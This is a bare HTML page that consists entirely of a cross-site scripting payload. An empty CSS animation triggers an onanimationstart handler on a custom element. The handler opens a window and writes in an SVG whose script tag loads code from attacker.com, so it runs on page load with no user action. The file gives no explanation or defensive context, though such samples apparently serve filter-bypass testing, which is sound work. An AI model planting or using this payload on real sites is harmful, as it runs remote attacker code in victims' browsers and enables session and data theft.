<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<style>@keyframes GGGGGuxRLGGGGGG{}</style>
<xss style=animation-name:GGGGGuxRLGGGGGG onanimationstart="w=window.open('self.js'); w.document.write('<svg xmlns:svg=http://www.w3.org/2000/svg xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink><script src=https://attacker.com/static/static.js><\/script><\/svg>');"></xss>
</body>
</html>
